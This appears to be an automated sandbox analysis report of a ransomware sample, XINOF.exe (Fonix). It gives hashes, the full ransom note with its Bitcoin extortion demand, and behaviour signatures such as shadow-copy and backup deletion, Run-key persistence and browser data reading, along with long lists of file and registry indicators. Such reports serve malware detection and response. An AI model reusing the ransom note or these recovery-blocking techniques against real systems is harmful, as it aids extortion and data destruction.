4ce5dda2c3d39cc6c22058add4b64fbedc20f11ba06768b0a3b959f20c88f5fa

Analysis

max time kernel
254s
max time network
134s
platform
windows7_x64
resource
win7
submitted
12/07/2020, 07:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XINOF.exe
Size

561KB
MD5

ff23cd4f45d231f8af9f23a2e730bee6
SHA1

0eea13dc19ab5de9ec7ffd81ef89bddf5994f6ef
SHA256

4ce5dda2c3d39cc6c22058add4b64fbedc20f11ba06768b0a3b959f20c88f5fa
SHA512

78c90354ca919c7bdce56034b1a432e7c3a0860b9faf9d351f74c50c3a8521c343a29d5c9c8babbedcc741acdc4138dc6e3cdc2c8e337f97ed5b99cf583102e8

Score

10^/10

discovery evasion persistence ransomware spyware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\How To Decrypt Files.hta

Ransom Note

All your files have been encrypted!All your files have been encrypted due to a security problem with your PC. If you want to restore them, please send an email to [email protected] The crypter person username : Thunder You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. After payment we will send you the decryption tool. You have to 48 hours(2 Day) To contact or paying us After that, you have to Pay Double . What is our decryption guarantee? Before paying you can send us up to 3 test files for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) How to obtain Bitcoins The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. https://localbitcoins.com/buy_bitcoins Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/ Attention! Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. Do not pay any money before decrypting the test files. If your decryption, is not done after payment, report the username on website (along with evidence such as transfer id) Regards-FonixTeam

Emails

[email protected]

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1296	bcdedit.exe
1776	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1896	wbadmin.exe

Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\UndoUnprotect.tiff	XINOF.exe
File opened for modification	C:\Users\Admin\Pictures\StepRead.tiff	XINOF.exe

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Cpriv.key	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\How To Decrypt Files.hta	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Help.txt	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cpriv.key	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\How To Decrypt Files.hta	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Help.txt	XINOF.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1384	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Drops desktop.ini file(s) 64 IoCs

description	ioc	Process
File created	C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Music\desktop.ini	XINOF.exe
File created	C:\Users\Public\Music\desktop.ini	XINOF.exe
File created	C:\Program Files\desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Ringtones\desktop.ini	XINOF.exe
File created	C:\Users\Public\Documents\desktop.ini	XINOF.exe
File created	C:\Users\Public\Libraries\desktop.ini	XINOF.exe
File created	C:\Users\Public\Music\Sample Music\desktop.ini	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	XINOF.exe
File created	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Contacts\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Favorites\Links for United States\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Videos\desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini	XINOF.exe
File created	C:\Users\Public\Recorded TV\desktop.ini	XINOF.exe
File created	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	XINOF.exe
File created	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	XINOF.exe
File created	C:\Users\Public\Desktop\desktop.ini	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\Favorites\Links\desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	XINOF.exe
File created	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	XINOF.exe
File created	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	XINOF.exe
File created	C:\Users\Public\Videos\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AJM03J3Y\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	XINOF.exe
File created	C:\Users\Public\Videos\Sample Videos\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZMLBLRQ7\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Desktop\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Pictures\desktop.ini	XINOF.exe
File created	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V8SX06NR\desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini	XINOF.exe
File created	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	XINOF.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	XINOF.exe
File created	C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\RBDIK06K\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\Downloads\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Favorites\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Links\desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Searches\desktop.ini	XINOF.exe
File created	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	XINOF.exe
File created	C:\Program Files (x86)\desktop.ini	XINOF.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\I:	label.exe
File opened (read-only)	\??\M:	label.exe
File opened (read-only)	\??\Q:	label.exe
File opened (read-only)	\??\D:	label.exe
File opened (read-only)	\??\N:	label.exe
File opened (read-only)	\??\O:	label.exe
File opened (read-only)	\??\P:	label.exe
File opened (read-only)	\??\R:	label.exe
File opened (read-only)	\??\T:	label.exe
File opened (read-only)	\??\V:	label.exe
File opened (read-only)	\??\W:	label.exe
File opened (read-only)	\??\X:	label.exe
File opened (read-only)	\??\F:	label.exe
File opened (read-only)	\??\J:	label.exe
File opened (read-only)	\??\K:	label.exe
File opened (read-only)	\??\A:	label.exe
File opened (read-only)	\??\B:	label.exe
File opened (read-only)	\??\S:	label.exe
File opened (read-only)	\??\Y:	label.exe
File opened (read-only)	\??\Z:	label.exe
File opened (read-only)	\??\E:	label.exe
File opened (read-only)	\??\G:	label.exe
File opened (read-only)	\??\H:	label.exe
File opened (read-only)	\??\L:	label.exe
File opened (read-only)	\??\U:	label.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL090.XML	XINOF.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Web.Entity.dll	XINOF.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar	XINOF.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\Cpriv.key	XINOF.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_sr.dll	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\POLICIES.FDT	XINOF.exe
File created	C:\Program Files\Windows Media Player\Visualizations\Help.txt	XINOF.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_ButtonGraphic.png	XINOF.exe
File created	C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.UDT	XINOF.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR37F.GIF	XINOF.exe
File created	C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ESEN\Cpriv.key	XINOF.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\Cpriv.key	XINOF.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\How To Decrypt Files.hta	XINOF.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\Help.txt	XINOF.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\ACEODEXL.DLL	XINOF.exe
File created	C:\Program Files\Windows Defender\MpOAV.dll	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Thatch.eftx	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\MSOHEV.DLL	XINOF.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239975.WMF	XINOF.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc.exe	XINOF.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\How To Decrypt Files.hta	XINOF.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\How To Decrypt Files.hta	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\WWLIB.DLL	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\OUTLWVW.DLL.IDX_DLL	XINOF.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mai\Cpriv.key	XINOF.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00260_.WMF	XINOF.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll	XINOF.exe
File opened for modification	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\da.pak	XINOF.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\jsdebuggeride.dll	XINOF.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECLIPSE\ECLIPSE.ELM	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0230876.WMF	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PULLQUOTEBB.POC	XINOF.exe
File created	C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUEPRNT\How To Decrypt Files.hta	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Document Themes 14\Composite.thmx	XINOF.exe
File created	C:\Program Files\Common Files\System\MSMAPI\Help.txt	XINOF.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_over.png	XINOF.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libspatializer_plugin.dll	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\PUBWIZ\STORYVERTBB.POC	XINOF.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar	XINOF.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\Cpriv.key	XINOF.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01473_.WMF	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENV98SP.POC	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_OFF.GIF	XINOF.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\Help.txt	XINOF.exe
File opened for modification	C:\Program Files\Java\jre7\bin\npt.dll	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg	XINOF.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Cpriv.key	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME14.CSS	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL086.XML	XINOF.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png	XINOF.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD	XINOF.exe
File created	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Groove.en-us\How To Decrypt Files.hta	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN01308_.WMF	XINOF.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac	XINOF.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\Help.txt	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\SNEEZE.WAV	XINOF.exe
File created	C:\Program Files (x86)\Adobe\Cpriv.key	XINOF.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02413_.WMF	XINOF.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File created	C:\Windows\How To Decrypt Files.hta	XINOF.exe
File created	C:\Windows\Help.txt	XINOF.exe
File created	C:\Windows\Cpriv.key	XINOF.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
316	1228	WerFault.exe	20

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
388	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
740	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_Classes\Local Settings	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Explorer.EXE

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
1524	PING.EXE
904	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
812	mshta.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
316	WerFault.exe
316	WerFault.exe
316	WerFault.exe
316	WerFault.exe
1672	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1156	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 61 IoCs

description	pid	Process
Token: SeDebugPrivilege	316	WerFault.exe
Token: SeIncreaseQuotaPrivilege	1620	WMIC.exe
Token: SeSecurityPrivilege	1620	WMIC.exe
Token: SeTakeOwnershipPrivilege	1620	WMIC.exe
Token: SeLoadDriverPrivilege	1620	WMIC.exe
Token: SeSystemProfilePrivilege	1620	WMIC.exe
Token: SeSystemtimePrivilege	1620	WMIC.exe
Token: SeProfSingleProcessPrivilege	1620	WMIC.exe
Token: SeIncBasePriorityPrivilege	1620	WMIC.exe
Token: SeCreatePagefilePrivilege	1620	WMIC.exe
Token: SeBackupPrivilege	1620	WMIC.exe
Token: SeRestorePrivilege	1620	WMIC.exe
Token: SeShutdownPrivilege	1620	WMIC.exe
Token: SeDebugPrivilege	1620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1620	WMIC.exe
Token: SeRemoteShutdownPrivilege	1620	WMIC.exe
Token: SeUndockPrivilege	1620	WMIC.exe
Token: SeManageVolumePrivilege	1620	WMIC.exe
Token: 33	1620	WMIC.exe
Token: 34	1620	WMIC.exe
Token: 35	1620	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1620	WMIC.exe
Token: SeSecurityPrivilege	1620	WMIC.exe
Token: SeTakeOwnershipPrivilege	1620	WMIC.exe
Token: SeLoadDriverPrivilege	1620	WMIC.exe
Token: SeSystemProfilePrivilege	1620	WMIC.exe
Token: SeSystemtimePrivilege	1620	WMIC.exe
Token: SeProfSingleProcessPrivilege	1620	WMIC.exe
Token: SeIncBasePriorityPrivilege	1620	WMIC.exe
Token: SeCreatePagefilePrivilege	1620	WMIC.exe
Token: SeBackupPrivilege	1620	WMIC.exe
Token: SeRestorePrivilege	1620	WMIC.exe
Token: SeShutdownPrivilege	1620	WMIC.exe
Token: SeDebugPrivilege	1620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1620	WMIC.exe
Token: SeRemoteShutdownPrivilege	1620	WMIC.exe
Token: SeUndockPrivilege	1620	WMIC.exe
Token: SeManageVolumePrivilege	1620	WMIC.exe
Token: 33	1620	WMIC.exe
Token: 34	1620	WMIC.exe
Token: 35	1620	WMIC.exe
Token: SeBackupPrivilege	1040	vssvc.exe
Token: SeRestorePrivilege	1040	vssvc.exe
Token: SeAuditPrivilege	1040	vssvc.exe
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE

Suspicious use of FindShellTrayWindow 46 IoCs

pid	Process
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE

Suspicious use of SendNotifyMessage 50 IoCs

pid	Process
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1492 wrote to memory of 1016	1492	XINOF.exe	25
